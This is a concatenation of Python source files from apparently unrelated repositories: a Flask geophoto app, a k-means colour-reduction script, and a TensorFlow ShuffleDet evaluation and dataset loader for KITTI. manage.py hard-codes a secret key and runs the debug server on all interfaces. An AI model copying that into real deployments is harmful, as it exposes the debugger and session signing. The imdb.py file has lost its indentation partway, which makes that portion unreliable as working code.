        # expose the manifest key on each record
        item['key'] = key
        articles.append(item)
    return { "results": articles }
def article(key):
    """Load one article: manifest metadata plus the rendered markdown body."""
    with open(join(article_path, 'index.json'), 'rb') as f:
        article_meta = json.load(f)[key]
    with codecs.open(join(article_path, key), 'r', "utf-8") as f:
        body = f.read()
    # NOTE(review): the 'encoding' kwarg belongs to old Markdown releases -
    # confirm against the pinned library version.
    article_meta['body'] = markdown.markdown(body, encoding="utf-8")
    return article_meta
def tags(id):
    """All tags attached to photo *id* as {"results": [{tag}, ...]}."""
    with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
        cur.execute("""
            select tag from geophoto.tags
            where id = %s
        """, (id,))
        return {"results": [dict(x) for x in cur] }
def add_tags(id, tags):
    """Attach tags to a photo and return the photo's full tag list.

    Raises ValueError when any of the tags already exists for the photo.
    """
    with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
        try:
            cur.executemany("""
                insert into geophoto.tags VALUES (%s, %s)
            """, zip(repeat(id), tags))
        except psycopg2.IntegrityError:
            raise ValueError("Tag already exists for this photo.")
        # re-read from geophoto.tags; the previous bare "tags" table name
        # only worked when the schema happened to be on the search_path
        cur.execute("""
            select tag from geophoto.tags
            where id = %s
        """, (id,))
        return {"results": [dict(x) for x in cur] }
|
cacahootie/geophoto | geophoto/__init__.py | <filename>geophoto/__init__.py
import os
from flask import Flask
basedir = os.path.dirname(os.path.abspath(__file__))
index_path = os.path.join(basedir,'static','index.html')
# Flask application with an explicit static folder next to this package.
app = Flask(
    'geophoto',
    static_folder=os.path.join(basedir,'static'),
    static_url_path='/static'
)
# NOTE(review): Python 2 implicit relative import; registers the routes.
import views
|
cacahootie/geophoto | manage.py | import subprocess
from flask.ext.script import Manager
from geophoto import app
from geophoto import models
manager = Manager(app)
@manager.command
def load():
    """Import photos: orient new images, extract EXIF GPS, store in Postgres."""
    models.process_photos()
@manager.command
def run():
    """Serve the app on 0.0.0.0:8008 with the debugger enabled."""
    # NOTE(review): hard-coded secret key and debug=True - development only.
    app.secret_key = 'super secret key'
    app.run(
        host='0.0.0.0',
        port=8008,
        debug=True
    )
if __name__ == "__main__":
    # Flask-Script dispatch: `python manage.py load` / `python manage.py run`.
    manager.run()
|
cacahootie/geophoto | geophoto/oembed.py | <reponame>cacahootie/geophoto
from json import loads
from urlparse import urlparse
from flask import current_app as app
from flask import request
def thumbUrl(thumb):
    """Imgix URL for a 200x150 entropy-cropped article thumbnail."""
    return ("https://venturelog.imgix.net/articles/" + thumb
            + "?w=200&h=150&fit=crop&crop=entropy&auto=compress,format")
def html(article):
    """Render the oEmbed rich-HTML snippet: headline and leader paragraphs."""
    return '<div><p>{0}</p><p>{1}</p></div>'.format(article['headline'], article['leader'])
def oembed(url):
    """Build the oEmbed response dict for an article URL.

    Fetches the article's JSON through the app's own test client; when the
    caller asked for format=html, returns the bare HTML snippet instead.
    """
    path = urlparse(url).path + "?format=json"
    with app.test_client() as c:
        rv = c.get(path)
    try:
        article = loads(rv.data)
    except ValueError:
        # log the offending URL/path before re-raising (Python 2 prints)
        print url
        print path
        raise
    if request.args.get("format") == "html":
        return html(article)
    return {
        "success": True,
        "type": "rich",
        "version": "1.0",
        "provider_name": "Venturelog",
        "provider_url": "http://www.venturelog.io",
        "title": article['headline'],
        "author_name": "<NAME>",
        "author_url": "http://www.venturelog.io",
        "height": "300",
        "width": "800",
        "thumbnail_width": "200",
        "thumbnail_height": str(int(200 * float(3)/4)),
        "thumbnail_url": thumbUrl(article['thumbnail']),
        "html": html(article)
    }
|
N0star/pixacolor | pxc.py | <gh_stars>1-10
I = '''FDC # PXC # 1.0.0 # 2020'''  # program banner shown by the 'i' (info) command
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
def upload(name): #get an image
    """Load an image from disk and flatten it into a list of pixel arrays.

    Returns (flat_pixel_list, original_image_array).
    """
    img = mpimg.imread(name)
    tab = []
    for i in range(len(img)):
        for j in range(len(img[i])):
            tab.append(img[i][j])
    print("table size: ",len(tab))
    return tab, img
def minipix(xx, cc, idx):
    """Collapse the image to the reduced palette: overwrite each pixel of
    *xx* (in place) with the centroid colour it was assigned to."""
    for pos in range(len(xx)):
        xx[pos] = cc[idx[pos]]
    return xx
def download(xx, pic):
    """Reshape the flat pixel list *xx* back into a row/column grid with the
    same geometry as *pic*, converting each pixel to integer channels."""
    n_cols = len(pic[0])
    n_rows = len(pic)
    grid = []
    for r in range(n_rows):
        row = []
        for c in range(n_cols):
            row.append(xx[r * n_cols + c].astype(int))
        grid.append(row)
    return grid
def kc_init(xx, k):
    """Initialise the k-means centroids with *k* pixels drawn at random.

    The original computed a random permutation but then ignored it, always
    returning the first k pixels; the permutation is now actually used so
    the starting centroids are random.
    """
    ridx = np.random.permutation(len(xx))
    return [xx[i] for i in ridx[:k]]
def find_cc(xx, cc):
    """Return, for each pixel in *xx*, the index of the closest centroid in *cc*.

    Distance is the squared Euclidean norm.  The running minimum starts at
    +inf: the previous hard-coded 9999 silently left pixels assigned to
    cluster 0 whenever every squared distance exceeded it (easily reached
    with 0-255 RGB data, where one channel difference of 100+ is enough).
    """
    indx = []
    for i in range(len(xx)):
        best = float('inf')
        indx.append(0)
        for j in range(len(cc)):
            diff = xx[i] - cc[j]
            dist = np.linalg.norm(diff) ** 2
            if dist < best:
                best = dist
                indx[i] = j
    return indx
def ccc(xx, idx, k):
    """Recompute the k centroids as the mean colour of their assigned pixels."""
    sums = [np.zeros(len(xx[i])) for i in range(k)]
    counts = [0] * k
    # accumulate per-cluster pixel sums and member counts (idx[i] labels xx[i])
    for pos in range(len(idx)):
        sums[idx[pos]] += xx[pos]
        counts[idx[pos]] += 1
    # divide in place to obtain each cluster's mean
    for i in range(k):
        sums[i] /= counts[i]
    return sums
def setting(n=-1,k=-1):
    """Prompt for / confirm the iteration count and colour count.

    Reads the module-level ``name``, ``tab`` and ``pic`` set by upload().
    Returns (abort_flag, tab, pic, n, k); abort_flag is 0 when confirmed.
    """
    if(n<0): n = input("Number of interations (int): ")
    if(k<0): k = input("Number of colours (int): ")
    # at most 256 palette colours
    n = int(n); k = int(k)%256;
    print("File: ",name,", k=",k,", n=",n)
    ch = input("Is this data correct? (Y/n): ")
    if(ch=='Y' or ch=='y'): f=0;
    else: f=1;
    return f,tab,pic,n,k;
#tab, pic = upload("Homare.jpeg")
#k=8; tab = tab[:1000] # testing
# Interactive main loop: parse one command line per iteration, then execute
# the upload / reduce / save / info / quit actions it selected.
tab = []; pic = []; img = False;
print("Welcome to Pixacolor!")
while True: # main menu # MAIN LOOP #
    ch=input("\nu - upload, s - save,\nr - reduce colors\n"
        +"i - info, q - quit.\n\n"); cmd=ch.split(); ch=ch[0];
    # action flags: 0 = off, 1 = interactive, 2 = fully specified inline
    upl = 0; red = 0; sav = 0; inf = 0; qui = 0;
    for i in range(len(cmd)):
        if(cmd[i]=='u'): #case upload
            upl+=1;
            try:
                name=cmd[i+1] #req img name
                upl+=1; j=0;
                try:
                    # optional trailing "r n k" enables an immediate reduce
                    if(cmd[i+2]=='r'): j=1;
                    n=int(cmd[i+2+j]);
                    k=int(cmd[i+3+j]);
                    upl+=1; red=2;
                except IndexError: continue
            except IndexError: continue
        elif(cmd[i]=='r'): #case reduce
            red=1;
            try:
                n=int(cmd[i+1]);
                k=int(cmd[i+2]);
                red=2;
            except IndexError: continue
            except ValueError: continue
        elif(cmd[i]=='s' or cmd[i]=='as'): #case save
            if(cmd[i]=='as'):
                # auto-name: <image>_<colours>x<iterations>
                target=name+"_"+str(k)+"x"+str(n);
                sav=2;
            else:
                sav=1;
                try:
                    target=cmd[i+1]; sav=2;
                except IndexError: continue
        elif(cmd[i]=='i' ): inf=1; #case info
        elif(cmd[i]=='q' ): qui=1; #case quit
    if(ch=='q'): break;
    if(upl>0):
        if(upl<2):
            name = input("Image name: ")
        tab = []; pic = []; img = True;
        try:
            tab,pic = upload(name)
        except FileNotFoundError:
            img=False; print("File not found...");
    if(red>0 or upl==3):
        if(img):
            if(red<2): f,tab,pic,itn,k = setting()
            else: f,tab,pic,itn,k = setting(n,k)
            if(not f):
                # k-means colour reduction: init, iterate, then apply palette
                cc = kc_init(tab,k)
                for i in range(itn):
                    print("Searching...",i+1)
                    idx = find_cc(tab,cc)
                    print("Updating...",i+1)
                    cc = ccc(tab,idx,k)
                print("Final search...")
                idx = find_cc(tab,cc)
                print("Reducing...")
                xx = minipix(tab,cc,idx)
                print("Completing...")
                npic = download(xx,pic)
                print("Ready!")
        else: print("No image's been found!");
    if(sav>0):
        # NOTE(review): 'npic' is only bound after a successful reduction, so
        # saving before any reduce raises NameError before this None check.
        if(npic is not None):
            if(sav<2):
                print("Name file to save, or...\ntype 'show' to show instead")
                name=input()
            else: name=target;
            fig = plt.matshow(npic)
            if(name=='show'):
                plt.show()
            else:
                name=name+".png"
                plt.axis('off')
                plt.savefig(name, bbox_inches='tight')
        else: print("No image to save")
    if(inf):
        print(I);
    if(qui): break;
|
twangnh/Distilling-Object-Detectors-Shuffledet | eval_model.py | <reponame>twangnh/Distilling-Object-Detectors-Shuffledet<filename>eval_model.py<gh_stars>10-100
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from lib.config import *
from dataset_tool import kitti
from lib.utils.util import bbox_transform, Timer
from lib.models.shuffleDet import ShuffleDet_conv1_stride1, ShuffleDet_conv1_stride1_supervisor
from tensorflow.python import debug as tf_debug
from tensorflow.python.client import timeline
FLAGS = tf.app.flags.FLAGS
# Command-line configuration (TF1-style flags); defaults target local KITTI eval.
tf.app.flags.DEFINE_string('dataset', 'KITTI',
                           """Currently support PASCAL_VOC or KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'test',
                           """Only used for VOC data."""
                           """Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
                           """VOC challenge year. 2007 or 2012"""
                           """Only used for VOC data""")
tf.app.flags.DEFINE_string('eval_dir', '/home/wangtao/prj/shuffle_sup_shuffle/with_pretrain/eval1',
                           """Directory where to write event logs """)
tf.app.flags.DEFINE_string('checkpoint_path', '',
                           """Path to the training checkpoint.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 1,
                            """How often to check if new cpt is saved.""")
tf.app.flags.DEFINE_boolean('run_once', False,
                            """Whether to run eval only once.""")
tf.app.flags.DEFINE_string('net', 'ShuffleDet_conv1_stride1',
                           """Neural net architecture.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
tf.app.flags.DEFINE_float('student', 0.5, """student model, 0.5 or 0.25""")
# maintain the max mAP
MAX_MAP = 0.
def eval_once(
        saver, ckpt_path, summary_writer, eval_summary_ops, eval_summary_phs, imdb,
        model):
    """Evaluate a single checkpoint: run detection over the whole image set,
    compute per-class APs, and write TensorBoard summaries.

    Tracks the best mAP seen so far in the module-global MAX_MAP.
    """
    global MAX_MAP
    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.4)
    with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=gpu_options)) as sess:
        #sess = tf_debug.LocalCLIDebugWrapperSession(sess, dump_root= '/home/wangtao/tfdbg_dump')
        # Restores from checkpoint
        saver.restore(sess, ckpt_path)
        all_vars = tf.global_variables()
        # sanity check: batch-norm statistics that are still all-zero were
        # probably never restored from the checkpoint
        for var in all_vars:
            if ('mean' in var.name) or ('variance' in var.name):
                if sess.run(tf.reduce_sum(tf.cast(tf.equal(var, 0), tf.float32))) >0:
                    print (var.name)
        # Assuming model_checkpoint_path looks something like:
        # /ckpt_dir/model.ckpt-0,
        # extract global_step from it.
        global_step = ckpt_path.split('/')[-1].split('-')[-1]
        num_images = len(imdb.image_idx)
        # all_boxes[class][image] accumulates [x1,y1,x2,y2,score] detections
        all_boxes = [[[] for _ in xrange(num_images)]
                     for _ in xrange(imdb.num_classes)]
        _t = {'im_detect': Timer(), 'im_read': Timer(), 'misc': Timer()}
        num_detection = 0.0
        for i in xrange(num_images):
            _t['im_read'].tic()
            images, scales = imdb.read_image_batch(shuffle=False)
            _t['im_read'].toc()
            _t['im_detect'].tic()
            det_bbox, score, det_class = sess.run(
                [model.det_bbox_post, model.score_post, model.det_class_post],
                feed_dict={model.image_input: images, model.scale_eval: scales})
            _t['im_detect'].toc()
            num_detection += len(det_bbox)
            for c, b, s in zip(det_class, det_bbox, score):
                all_boxes[c][i].append(np.hstack([b,s]))
            print('im_detect: {:d}/{:d} im_read: {:.3f}s '
                  'detect: {:.3f}s '.format(
                      i + 1, num_images, _t['im_read'].average_time,
                      _t['im_detect'].average_time))
        print('Evaluating detections...')
        aps, ap_names = imdb.evaluate_detections(
            FLAGS.eval_dir, global_step, all_boxes)
        print('Evaluation summary:')
        print(' Average number of detections per image: {}:'.format(
            num_detection / num_images))
        print(' Timing:')
        print(' im_read: {:.3f}s detect: {:.3f}s misc: {:.3f}s'.format(
            _t['im_read'].average_time, _t['im_detect'].average_time,
            _t['misc'].average_time))
        print(' Average precisions:')
        # feed the scalar summaries through their placeholders
        feed_dict = {}
        for cls, ap in zip(ap_names, aps):
            feed_dict[eval_summary_phs['APs/' + cls]] = ap
            print(' {}: {:.3f}'.format(cls, ap))
        print(' Mean average precision: {:.3f}'.format(np.mean(aps)))
        if np.mean(aps) > MAX_MAP:
            MAX_MAP = np.mean(aps)
        feed_dict[eval_summary_phs['highest_APs/mAP']] = MAX_MAP
        feed_dict[eval_summary_phs['APs/mAP']] = np.mean(aps)
        feed_dict[eval_summary_phs['timing/im_detect']] = \
            _t['im_detect'].average_time
        feed_dict[eval_summary_phs['timing/im_read']] = \
            _t['im_read'].average_time
        feed_dict[eval_summary_phs['timing/post_proc']] = \
            _t['misc'].average_time
        feed_dict[eval_summary_phs['num_det_per_image']] = \
            num_detection / num_images
        print('Analyzing detections...')
        stats, ims = imdb.do_detection_analysis_in_eval(
            FLAGS.eval_dir, global_step)
        eval_summary_str = sess.run(eval_summary_ops, feed_dict=feed_dict)
        for sum_str in eval_summary_str:
            summary_writer.add_summary(sum_str, global_step)
def evaluate():
    """Evaluate.

    Builds the model graph, the summary ops, and a restore-Saver, then either
    evaluates one fixed checkpoint (run_once) or polls checkpoint_path
    forever, evaluating each new checkpoint as it appears.
    """
    assert FLAGS.dataset == 'KITTI', \
        'Currently only supports KITTI dataset'
    os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
    with tf.Graph().as_default() as g:
        mc = kitti_shuffledet_config()
        mc.BATCH_SIZE = 1
        mc.LOAD_PRETRAINED_MODEL = False
        if FLAGS.net =='ShuffleDet_conv1_stride1_supervisor':
            model = ShuffleDet_conv1_stride1_supervisor(mc)
        elif FLAGS.net =='ShuffleDet_conv1_stride1':
            model = ShuffleDet_conv1_stride1(mc, student=FLAGS.student)
        imdb = kitti(FLAGS.image_set, './data/KITTI', mc)
        # add summary ops and placeholders
        ap_names = []
        for cls in imdb.classes:
            ap_names.append(cls + '_easy')
            ap_names.append(cls + '_medium')
            ap_names.append(cls + '_hard')
        eval_summary_ops = []
        eval_summary_phs = {}
        for ap_name in ap_names:
            ph = tf.placeholder(tf.float32)
            eval_summary_phs['APs/' + ap_name] = ph
            eval_summary_ops.append(tf.summary.scalar('APs/' + ap_name, ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['APs/mAP'] = ph
        eval_summary_ops.append(tf.summary.scalar('APs/mAP', ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['highest_APs/mAP'] = ph
        eval_summary_ops.append(tf.summary.scalar('highest_APs/mAP', ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['timing/im_detect'] = ph
        eval_summary_ops.append(tf.summary.scalar('timing/im_detect', ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['timing/im_read'] = ph
        eval_summary_ops.append(tf.summary.scalar('timing/im_read', ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['timing/post_proc'] = ph
        eval_summary_ops.append(tf.summary.scalar('timing/post_proc', ph))
        ph = tf.placeholder(tf.float32)
        eval_summary_phs['num_det_per_image'] = ph
        eval_summary_ops.append(tf.summary.scalar('num_det_per_image', ph))
        # restore only the variable subsets each architecture needs
        # NOTE(review): the local name "list" shadows the builtin here.
        if FLAGS.net == 'ShuffleDet_conv1_stride1' or FLAGS.net == 'ShuffleDet_conv1_stride1_supervisor':
            gr = tf.global_variables(scope='g')
            global_step = tf.global_variables(scope='global')
            gr = [item for item in gr if item not in global_step]
            c = tf.global_variables(scope='conv1')
            add = tf.global_variables(scope='add')
            list = gr + c + add
            saver = tf.train.Saver(var_list=list)
        elif FLAGS.net == 'edet':
            full = tf.global_variables()
            iou = tf.global_variables(scope='iou')
            list = [item for item in full if item not in iou]
            saver = tf.train.Saver(var_list=list)
        else:
            pass
        summary_writer = tf.summary.FileWriter(FLAGS.eval_dir, g)
        ckpts = set()
        while True:
            if FLAGS.run_once:
                # When run_once is true, checkpoint_path should point to the exact
                # checkpoint file.
                eval_once(
                    saver, FLAGS.checkpoint_path, summary_writer, eval_summary_ops,
                    eval_summary_phs, imdb, model)
                return
            else:
                # When run_once is false, checkpoint_path should point to the directory
                # that stores checkpoint files.
                ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_path)
                if ckpt and ckpt.model_checkpoint_path:
                    if ckpt.model_checkpoint_path in ckpts:
                        # Do not evaluate on the same checkpoint
                        print('Wait {:d}s for new checkpoints to be saved ... '
                              .format(FLAGS.eval_interval_secs))
                        time.sleep(FLAGS.eval_interval_secs)
                    else:
                        ckpts.add(ckpt.model_checkpoint_path)
                        print('Evaluating {}...'.format(ckpt.model_checkpoint_path))
                        eval_once(
                            saver, ckpt.model_checkpoint_path, summary_writer,
                            eval_summary_ops, eval_summary_phs, imdb, model)
                else:
                    print('No checkpoint file found')
                    if not FLAGS.run_once:
                        print('Wait {:d}s for new checkpoints to be saved ... '
                              .format(FLAGS.eval_interval_secs))
                        time.sleep(FLAGS.eval_interval_secs)
def main(argv=None): # pylint: disable=unused-argument
    """Entry point: wipe any previous eval dir, then start the evaluation loop."""
    if tf.gfile.Exists(FLAGS.eval_dir):
        tf.gfile.DeleteRecursively(FLAGS.eval_dir)
    tf.gfile.MakeDirs(FLAGS.eval_dir)
    evaluate()
if __name__ == '__main__':
    tf.app.run()
|
twangnh/Distilling-Object-Detectors-Shuffledet | dataset_tool/imdb.py | import os
import random
import shutil
from PIL import Image, ImageFont, ImageDraw
import cv2
import numpy as np
from lib.utils.util import iou, batch_iou
from augmentation import BrightnessTransform, ContrastTransform, SaturationTransform
class imdb(object):
"""Image database."""
    def __init__(self, name, mc):
        """Base image database: bookkeeping shared by concrete datasets.

        Subclasses are expected to populate _classes, _image_set,
        _image_idx, _data_root_path and _rois.
        """
        self._name = name
        self._classes = []
        self._image_set = []
        self._image_idx = []
        self._data_root_path = []
        self._rois = {}
        self.mc = mc
        # batch reader
        self._perm_idx = None
        self._cur_idx = 0
        #mimic thresh
        self._mimic_trhesh1= 0.5
        self._mimic_trhesh2= 0.5
    @property
    def name(self):
        # dataset identifier string
        return self._name
    @property
    def classes(self):
        # list of object class names (filled by the subclass)
        return self._classes
    @property
    def num_classes(self):
        # number of object classes
        return len(self._classes)
    @property
    def image_idx(self):
        # list of image indices/ids in the current split
        return self._image_idx
    @property
    def image_set(self):
        # split name (e.g. train/val/test) as set by the subclass
        return self._image_set
    @property
    def data_root_path(self):
        # filesystem root of the dataset
        return self._data_root_path
    @property
    def year(self):
        # NOTE(review): _year is never set in this base class - only valid
        # for subclasses (e.g. VOC) that define it.
        return self._year
def _shuffle_image_idx(self):
self._perm_idx = [self._image_idx[i] for i in
np.random.permutation(np.arange(len(self._image_idx)))]
self._cur_idx = 0
def read_image_batch(self, shuffle=True):
"""Only Read a batch of images
Args:
shuffle: whether or not to shuffle the dataset
Returns:
images: length batch_size list of arrays [height, width, 3]
"""
mc = self.mc
if shuffle:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
self._shuffle_image_idx()
batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
else:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
batch_idx = self._image_idx[self._cur_idx:] \
+ self._image_idx[:self._cur_idx + mc.BATCH_SIZE - len(self._image_idx)]
self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
else:
batch_idx = self._image_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
images, scales = [], []
for i in batch_idx:
im = cv2.imread(self._image_path_at(i))
im = im.astype(np.float32, copy=False)
im -= mc.BGR_MEANS
orig_h, orig_w, _ = [float(v) for v in im.shape]
im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
x_scale = mc.IMAGE_WIDTH / orig_w
y_scale = mc.IMAGE_HEIGHT / orig_h
images.append(im)
scales.append((x_scale, y_scale))
return images, scales
# only used for kitti test set output
# def read_image_batch_testset(self, shuffle=True):
#
# def image_path_at(idx):
# image_path = os.path.join('./data/KITTI/testing/image_2', idx)
# assert os.path.exists(image_path), \
# 'Image does not exist: {}'.format(image_path)
# return image_path
#
# mc = self.mc
# if shuffle:
# if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
# self._shuffle_image_idx()
# batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
# self._cur_idx += mc.BATCH_SIZE
# else:
# if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
# batch_idx = self._image_idx[self._cur_idx:] \
# + self._image_idx[:self._cur_idx + mc.BATCH_SIZE - len(self._image_idx)]
# self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
# else:
# batch_idx = self._image_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
# self._cur_idx += mc.BATCH_SIZE
#
# images, scales = [], []
# for i in batch_idx:
# im = cv2.imread(image_path_at(i))
# # modify for eval result output
# im_orig = im
# im = im.astype(np.float32, copy=False)
# im -= mc.BGR_MEANS
# orig_h, orig_w, _ = [float(v) for v in im.shape]
# im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
# x_scale = mc.IMAGE_WIDTH / orig_w
# y_scale = mc.IMAGE_HEIGHT / orig_h
# images.append(im)
# scales.append((x_scale, y_scale))
#
# return images, im_orig, scales
def read_batch(self, shuffle=True, batch_size=1):
"""Read a batch of image and bounding box annotations.
Args:
shuffle: whether or not to shuffle the dataset
Returns:
image_per_batch: images. Shape: batch_size x width x height x [b, g, r]
label_per_batch: labels. Shape: batch_size x object_num
delta_per_batch: bounding box deltas. Shape: batch_size x object_num x
[dx ,dy, dw, dh]
aidx_per_batch: index of anchors that are responsible for prediction.
Shape: batch_size x object_num
bbox_per_batch: scaled bounding boxes. Shape: batch_size x object_num x
[cx, cy, w, h]
"""
mc = self.mc
if shuffle:
if self._cur_idx + batch_size >= len(self._image_idx):
self._shuffle_image_idx()
batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + batch_size]
self._cur_idx += batch_size
else:
if self._cur_idx + batch_size >= len(self._image_idx):
batch_idx = self._image_idx[self._cur_idx:] \
+ self._image_idx[:self._cur_idx + batch_size - len(self._image_idx)]
self._cur_idx += batch_size - len(self._image_idx)
else:
batch_idx = self._image_idx[self._cur_idx:self._cur_idx + batch_size]
self._cur_idx += batch_size
image_per_batch = []
label_per_batch = []
bbox_per_batch = []
delta_per_batch = []
aidx_per_batch = []
if mc.DEBUG_MODE:
avg_ious = 0.
num_objects = 0.
max_iou = 0.0
min_iou = 1.0
num_zero_iou_obj = 0
mask_per_batch = np.zeros([len(batch_idx), 24, 78]).astype(bool)
mask_per_batch2 = np.zeros([len(batch_idx), 24, 78, 9]).astype(bool)
for num_idx, idx in enumerate(batch_idx):
# load the image
# im = cv2.imread(self._image_path_at(idx)).astype(np.float32, copy=False)
##Mar 14 add augmentation
im = cv2.imread(self._image_path_at(idx))
im = BrightnessTransform(im)
im = ContrastTransform(im)
im = SaturationTransform(im)
im = im.astype(np.float32, copy=False)
im -= mc.BGR_MEANS
orig_h, orig_w, _ = [float(v) for v in im.shape]
# load annotations
label_per_batch.append([b[4] for b in self._rois[idx][:]])
gt_bbox = np.array([[b[0], b[1], b[2], b[3]] for b in self._rois[idx][:]])
if mc.DATA_AUGMENTATION:
assert mc.DRIFT_X >= 0 and mc.DRIFT_Y > 0, \
'mc.DRIFT_X and mc.DRIFT_Y must be >= 0'
if mc.DRIFT_X > 0 or mc.DRIFT_Y > 0:
# Ensures that gt boundibg box is not cutted out of the image
max_drift_x = min(gt_bbox[:, 0] - gt_bbox[:, 2] / 2.0 + 1)
max_drift_y = min(gt_bbox[:, 1] - gt_bbox[:, 3] / 2.0 + 1)
assert max_drift_x >= 0 and max_drift_y >= 0, 'bbox out of image'
dy = np.random.randint(-mc.DRIFT_Y, min(mc.DRIFT_Y + 1, max_drift_y))
dx = np.random.randint(-mc.DRIFT_X, min(mc.DRIFT_X + 1, max_drift_x))
# shift bbox
gt_bbox[:, 0] = gt_bbox[:, 0] - dx
gt_bbox[:, 1] = gt_bbox[:, 1] - dy
# distort image
orig_h -= dy
orig_w -= dx
orig_x, dist_x = max(dx, 0), max(-dx, 0)
orig_y, dist_y = max(dy, 0), max(-dy, 0)
distorted_im = np.zeros(
(int(orig_h), int(orig_w), 3)).astype(np.float32)
distorted_im[dist_y:, dist_x:, :] = im[orig_y:, orig_x:, :]
im = distorted_im
# Flip image with 50% probability
if np.random.randint(2) > 0.5:
im = im[:, ::-1, :]
gt_bbox[:, 0] = orig_w - 1 - gt_bbox[:, 0]
# scale image
im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
image_per_batch.append(im)
# scale annotation
x_scale = mc.IMAGE_WIDTH / orig_w
y_scale = mc.IMAGE_HEIGHT / orig_h
gt_bbox[:, 0::2] = gt_bbox[:, 0::2] * x_scale
gt_bbox[:, 1::2] = gt_bbox[:, 1::2] * y_scale
bbox_per_batch.append(gt_bbox)
aidx_per_image, delta_per_image = [], []
aidx_set = set()
mask_per_img = np.zeros([24, 78])
mask_per_img2 = np.zeros([24, 78, 9])
for i in range(len(gt_bbox)):
overlaps = batch_iou(mc.ANCHOR_BOX, gt_bbox[i])
#############add for mask preparation
##modify for det head mimic
overlaps_temp = np.transpose(np.reshape(overlaps, [24, 78, 9]), [2, 0, 1])
max_overlap_per_gbox = np.max(overlaps_temp)
positive_thresh1 = max_overlap_per_gbox * self._mimic_trhesh1
mask_per_gbox_per_anchor1 = (overlaps_temp > positive_thresh1).astype(int)
# merge all anchor mask, for last feature mimic
mask_per_gbox = mask_per_gbox_per_anchor1[0]
for anchor_inx in range(len(overlaps_temp)):
mask_per_gbox += mask_per_gbox_per_anchor1[anchor_inx]
# modify for gt box supervison
mask_per_img += mask_per_gbox
# x = int(gt_bbox[i][0]//16)
# y = int(gt_bbox[i][1]//16)
# w = int(gt_bbox[i][2]//16)
# h = int(gt_bbox[i][3]//16)
#
# mask_per_img[(y-h//2):y+(h//2), (x-w//2):x+(w//2)] +=1
# for det head mimic
positive_thresh2 = max_overlap_per_gbox * self._mimic_trhesh2
# [24, 78, 9]
mask_per_gbox_per_anchor2 = (np.reshape(overlaps, [24, 78, 9]) > positive_thresh2) \
.astype(int)
mask_per_img2 += mask_per_gbox_per_anchor2
# overlaps_batch.append(np.transpose(np.reshape(overlaps,[12,35,9]),[2,0,1]))
aidx = len(mc.ANCHOR_BOX)
for ov_idx in np.argsort(overlaps)[::-1]:
if overlaps[ov_idx] <= 0:
if mc.DEBUG_MODE:
min_iou = min(overlaps[ov_idx], min_iou)
num_objects += 1
num_zero_iou_obj += 1
break
if ov_idx not in aidx_set:
aidx_set.add(ov_idx)
aidx = ov_idx
if mc.DEBUG_MODE:
max_iou = max(overlaps[ov_idx], max_iou)
min_iou = min(overlaps[ov_idx], min_iou)
avg_ious += overlaps[ov_idx]
num_objects += 1
break
if aidx == len(mc.ANCHOR_BOX):
# even the largeset available overlap is 0, thus, choose one with the
# smallest square distance
dist = np.sum(np.square(gt_bbox[i] - mc.ANCHOR_BOX), axis=1)
for dist_idx in np.argsort(dist):
if dist_idx not in aidx_set:
aidx_set.add(dist_idx)
aidx = dist_idx
break
box_cx, box_cy, box_w, box_h = gt_bbox[i]
delta = [0] * 4
delta[0] = (box_cx - mc.ANCHOR_BOX[aidx][0]) / mc.ANCHOR_BOX[aidx][2]
delta[1] = (box_cy - mc.ANCHOR_BOX[aidx][1]) / mc.ANCHOR_BOX[aidx][3]
delta[2] = np.log(box_w / mc.ANCHOR_BOX[aidx][2])
delta[3] = np.log(box_h / mc.ANCHOR_BOX[aidx][3])
aidx_per_image.append(aidx)
delta_per_image.append(delta)
mask_per_batch[num_idx] = mask_per_img > 0
mask_per_batch2[num_idx] = mask_per_img2 > 0
delta_per_batch.append(delta_per_image)
aidx_per_batch.append(aidx_per_image)
if mc.DEBUG_MODE:
print ('max iou: {}'.format(max_iou))
print ('min iou: {}'.format(min_iou))
print ('avg iou: {}'.format(avg_ious / num_objects))
print ('number of objects: {}'.format(num_objects))
print ('number of objects with 0 iou: {}'.format(num_zero_iou_obj))
return image_per_batch, label_per_batch, delta_per_batch, \
aidx_per_batch, bbox_per_batch, mask_per_batch, mask_per_batch2
def load_images_and_encode_target(self):
def sparse_to_dense(sp_indices, output_shape, values, default_value=0):
"""Build a dense matrix from sparse representations.
Args:
sp_indices: A [0-2]-D array that contains the index to place values.
